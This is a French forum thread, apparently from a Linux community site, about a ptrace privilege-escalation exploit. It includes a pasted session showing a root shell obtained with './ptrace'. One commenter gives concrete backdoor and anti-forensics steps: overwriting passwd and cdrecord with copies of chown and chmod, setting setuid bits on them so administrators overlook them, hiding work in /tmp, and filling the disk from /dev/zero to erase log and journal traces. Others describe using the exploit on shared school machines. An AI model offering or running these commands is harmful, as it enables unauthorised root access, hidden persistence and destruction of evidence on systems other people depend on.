Mar 20 21:55:54 bigbobwks1 kernel: request_module[net-pf-27]: waitpid(8736,...) failed, errno 1
Et dans le shell ca donne ca :
bigbob@bigbobwks1:~$ ./ptrace
trying to catch 8760
one clone created
eip = 4000f287
we set all up
sh: no job control in this shell
sh-2.05a# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
sh-2.05a#
pour les autres users ... ce sera /usr/bin/passwd qui passera avent a cause de leur PATH ...
et comme l admin vera un stick bit sur passwd et cdrecord, il trouvera ca normale ...
une fois qu on a ces deux la ... c est la fete ...
puisque ca permet de faire passer root toute autre fichier binaire ...
c est une procedure elementaire qui permet de s auto reproduire, et de s etendre a d autres fichier ... c est comme la soupe primaire ... essentielle, mere de tout ...
si on continues le travail dans /tmp ... on peut passer relaitvement inapercu ... en prenant soin d effacer les fichiers crees ...
et si vous hakez un grand truc ... il faut aussi penser a effacer les anciennes versions du journal est autres inodes perdus , alors mettez vous en user et lancez un
cat /dev/zero > /tmp/tmp
ce qui realoura tous les inodes du disques pour la valeur 0 et effacera beaucoup de choses par la meme occasion ....
boh pkoi un [+] ? l'interet ici c'est plus de comprendre comment marche l'exploit, pas de jouer au script kiddie (enfin pour mon cas).
j'ai testé l'exploit...il marche très bien ;) mais voila c'est tt, j'en ferais pas plus
ah ah ... non c'est mieux que ça ici.
En fait, à la base ce sont des salles windows... les comptes sont partagés par samba..l'admin fait donc un tar de ton ~..... c'est top =) mon tar fait 70Mo ;) je peux prendre un café quand je me loggue... nan pis c'est un guignol point =)
# Re: exploits ptrace
Posté par Julien CARTIGNY (site web personnel) . Évalué à 1.
# Re: exploits ptrace
Posté par Marc (site web personnel) . Évalué à 0.
[^] # Re: exploits ptrace
Posté par BdherVil . Évalué à 1.
- Soit les admins savent lire un fichier de log et là c'est assez risqué
- Soit c'est des neuneus et alors fait toi plaise !
d'ailleur, linux loggue quoi comme action avec ce joujou ?
[^] # Re: exploits ptrace
Posté par Stephane COLIN (site web personnel) . Évalué à 2.
Mar 20 21:55:54 bigbobwks1 kernel: request_module[net-pf-27]: waitpid(8736,...) failed, errno 1
Et dans le shell ca donne ca :
bigbob@bigbobwks1:~$ ./ptrace
trying to catch 8760
one clone created
eip = 4000f287
we set all up
sh: no job control in this shell
sh-2.05a# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
sh-2.05a#
A++
[^] # Re: exploits ptrace
Posté par doublehp (site web personnel) . Évalué à -1.
c est plus risque sur du XFS ou autres systems journalises ...
mais on peut contourner ... par exemple moi je fais :
cp /bin/chown /usr/sbin/passwd
cp /bin/chmod /usr/sbin/cdrecord
chmod 7001 /usr/sbin/passwd /usr/sbin/cdrecord
pour les autres users ... ce sera /usr/bin/passwd qui passera avent a cause de leur PATH ...
et comme l admin vera un stick bit sur passwd et cdrecord, il trouvera ca normale ...
une fois qu on a ces deux la ... c est la fete ...
puisque ca permet de faire passer root toute autre fichier binaire ...
c est une procedure elementaire qui permet de s auto reproduire, et de s etendre a d autres fichier ... c est comme la soupe primaire ... essentielle, mere de tout ...
si on continues le travail dans /tmp ... on peut passer relaitvement inapercu ... en prenant soin d effacer les fichiers crees ...
et si vous hakez un grand truc ... il faut aussi penser a effacer les anciennes versions du journal est autres inodes perdus , alors mettez vous en user et lancez un
cat /dev/zero > /tmp/tmp
ce qui realoura tous les inodes du disques pour la valeur 0 et effacera beaucoup de choses par la meme occasion ....
( ca merite bien un [+] ... )
[^] # Re: exploits ptrace
Posté par Marc (site web personnel) . Évalué à 1.
[^] # Re: exploits ptrace
Posté par Marc (site web personnel) . Évalué à 1.
[^] # Re: exploits ptrace
Posté par Grocus . Évalué à 0.
Travailler il faut.
# Un "contournement" possible - A l'attention des sysadmins donc.
Posté par jigso . Évalué à 1.
Mais bon, ca a aussi d'autres inconvénients...
Suivre le flux des commentaires
Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.